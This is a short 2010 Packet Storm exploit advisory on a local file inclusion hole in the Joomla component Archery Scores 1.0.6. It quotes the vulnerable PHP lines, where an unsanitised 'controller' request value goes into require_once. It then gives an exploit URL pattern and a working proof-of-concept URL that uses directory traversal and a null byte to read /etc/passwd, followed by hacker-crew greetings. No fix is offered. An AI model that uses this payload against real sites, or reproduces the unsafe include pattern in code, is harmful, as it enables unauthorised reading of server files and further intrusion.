Joomla Archery Scores 1.0.6 Local File Inclusion

2010-04-19T00:00:00
ID PACKETSTORM:88635
Type packetstorm
Reporter wishnusakti
Modified 2010-04-19T00:00:00

Description

                                        
                                            ` ================================================================================================  
  
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability  
Vendor : http://lispeltuut.org/  
Download : http://lispeltuut.org/archery-scores/download  
  
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia  
Author : wishnusakti + inc0mp13te (HH)  
Contact : evileyes60117[at]yahoo.com  
  
================================================================================================  
  
[+] Vulnerable  
  
./components/com_archeryscores/archeryscores.php  
  
Line 22: if($controller = JRequest::getVar('controller')) {  
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');  
Line 24: }  
  
[+] Exploit  
  
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]  
  
[+] PoC  
  
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00  
  
================================================================================================  
  
Greetz to:  
  
Penghuni #nob0dy priv8 Server  
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Bot² Scan :D)  
en Semua Komunitas Hacking Tanah Air  
Peace Yo :)  
  
================================================================================================  
  
# ./wishnusakti  
`